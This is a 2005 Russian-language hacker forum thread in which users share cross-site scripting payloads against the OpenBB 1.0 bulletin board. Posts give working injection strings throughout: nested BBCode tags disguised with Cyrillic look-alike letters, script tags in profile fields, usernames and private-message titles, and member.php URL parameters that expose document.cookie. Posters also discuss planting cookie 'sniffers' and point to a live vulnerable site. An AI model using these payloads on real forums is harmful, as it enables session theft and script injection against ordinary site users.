PDA

Просмотр полной версии : XSS в OpenBB


KEZ
23.05.2005, 17:24
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
[еmаil=[/url]]aaa[/emаil]`style=background:url(javascript:alert());

[cоlor=[url=http://=`]a (http://=`)]a[/colоr]`style=background:url(javascript:alert());

[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());

Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87

KEZ
23.05.2005, 17:27
Также я нашел несколько Sql инжекция. Скоро опубликую

PinkPanther
23.05.2005, 20:04
КЕЗ, ты на локалхосте её сначала проверял?
Я тож как узнал про уязвимости Опасность:критическая
Тип:удалённая
Описание:параметр TID в скрипте read.php не фильтруется должным образом что может привести к SQL - иньекции.
В параметр reverse в member.php можно внедрить произвольный HTML или JavaScript код и вызвать XSS
Уязвимые версии:OpenBB 1.x
Наличие эксплойта:нет
Решения:нет
сразу на оффсайт, думаю скачаю, поищу, тока ни оффсайт, ни другие сайты, ссылки с которых ведут на оффсайт, не фурачат =(
И вот мля опять я опаздал =(

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.

KEZ
23.05.2005, 20:14
Это фигня с securitylab.ru.
А свои теги я сам нашел... И как я их мог НЕ ПРОВЕРЯТь на локалхосте? Конечно проверял.
Самый обычные XSS

PinkPanther
23.05.2005, 20:23
Не, я не то имел ввиду. Просто(может я галимо искал), но во время приведенного мной описания релиза оффсайт не работал. Вот это я и спросил...

Забей кароче....я просто хотел узнать где и когда ты его качнул, хочу сам посмотеть.

З.Ы. Обажаю таких разработчиков, дыры(сплойты) примитивнейшие.

KEZ
23.05.2005, 20:26
примитивные... да... они подойдут и к другим форумам кстате...
емейл, урл, имадж - самые распространенные... а сколько на форуме SQL inj

PinkPanther
23.05.2005, 20:38
Вот зайди щас на оффсайт: http://www.openbb.com/ и ты поймеш мой вопрос.
Где ты его взял? Потому что, толи я галимо ищу, толи его хер где найдеш нормальный.
Дай плиз ссылку, где качал. Мне оч интересно самому посмотреть.

KEZ
23.05.2005, 21:00
Я гдето с sourceforge.net качал... щас кажу

Algol
23.05.2005, 21:03
OpenBB 1.0 (уязвимы возможно и другие версии)
Травиально.

как всегда через руские буквы
[еmаil=]aaa[/emаil]`style=background:url(javascript:alert());

[cоlor=a (http://=/)]a[/colоr]`style=background:url(javascript:alert());

[sizе=[cоlor=a=`]a[/cоlor]]a[/sizе]`style=background:url(javascript:alert());

Есть ещё XSS, в основном с использованием других тегов,
найти их очень просто, я их не пишу.


Пример работы уязвимости:
http://s-channel.hut.ru/forum/read.php?TID=6&page=1#87

Первые две я не совсем понял...там где-то ошибка..

KEZ
24.05.2005, 21:06
Алгол, все верно, я же только что проверял на форумах и локалхосте.
Может там изза того что я буквы заменил на руские или форум чтото пропарсил

PinkPanther
25.05.2005, 01:45
1. Уязвимости в профиле пользователя.
Уязвимыми являются все поля, кроме поля Homepage, а именно, поля:Email, AOL, Yahoo!, Location, MSN, Biography, Occupation, Homepage Description, но не во все поля можно поместить сниффер, так как количество вводимых символов в них, ограниченное. Хотя локальным алертом насладится можно=)
Полноценно вставить снифф позволяют только такие поля, как: MSN, Biography, Occupation, Homepage Description. При просмотре профиля пользователя с форума, получаем такую вот штуку: <td><font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="1" color="#000000"><script>alert()</script></font></td>
Лол, никаких фильтров...красота=)

http://rts.h15.ru/pictures/openbb2+.png

2. Уязвимость в нике пользователя.
Хоть полноценный сниффер нам вставить и не удастся, но для приколов использовать можно. В данном движке, на главной странице всегда указывается последний зарегестрированный пользователь. Так как никаких блокировок и фильтраций нет, можно зарегестрировать пользователя: <script>alert('fuckyou')</script>, и каждый кто будет заходить на главную,
будет ловить этот алерт=)

3. Уязвимость в заголовках личных сообщений.
История сходна с форумным движком MercuryBoard. Заголовок личного сообщения не фильтрует символы. В итоге, в папке входящие, заголовок сообщения будет отображатся, как: <font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"><b>123<script>alert(document.cookie)</script></b></font></a></td>

http://rts.h15.ru/pictures/openbb3.png


P.S. Есть ещё дырявые bb теги,
javascript:alert()
[urІ=javascript:alert()]ClickME[/urI]
но на сёгодня уже всё, башка у меня уже не варит чтоб сегодня что-то ещё выжать....=( =( =(

P.P.S. Кстати, что это за хеширование идет? КЕЗ, ты был прав, куки очень странные.=(

KEZ
25.05.2005, 13:41
а вот через [img] ты снифер никак не вставить. и через ClickME

PinkPanther
25.05.2005, 20:10
http://www.hackzona.ru/hz.php?name=News&file=article&sid=4358&mode=&order=0&thold=0
Опасность:критическая
Тип:удалённая
Описание:в параметр reverse в member.php можно внедрить произвольный HTML или JavaScript код и вызвать XSS
Уязвимые версии:OpenBB 1.x
Наличие эксплойта:нет
Решения:нет
member.php?action=list&sortorder=homepage&perpage="><img%20src=javascript:alert(document.cookie)> member.php?action=list&sortorder=homepage&perpage=25&reverse=1"><img%20src=javascript:alert(document.cookie)> member.php?action=list&sortorder="><img%20src=javascript:alert(document.cookie)>
_____________________________________

Хотя пользы с них минимум, но тем немение....

KEZ
26.05.2005, 19:21
пользы с них вообще нет

PinkPanther
26.05.2005, 19:45
пользы с них вообще нет
Я знаю, это только для ознакомления и общего развития. Не больше.

KEZ
26.05.2005, 20:41
Вообще почему на секлабе не пишут про вложеные теги никогда.
только про дыры в профиле типа как ты привел

JazzzSummerMan
27.05.2005, 07:55
Кез фиг знат.. на секлабе много про что не пишут.. Вложенные теги - это все-таки не фундаментальная технология, да плюс ко всему вроде как недавно только нашли, пускай парсинг правильно организовывают. Уместнее было бы спросить почему не получило широкой огласки бага с кодировками в Ie

KEZ
27.05.2005, 09:10
Потомучто seclab.ru только публикуют новости, котрые дает им бабушка ЧеГевары, сами они найти ниче не в состоянии. А бабшука ЧеГевары нехочет чтобы на фигне вроде секлаба были реальные баги.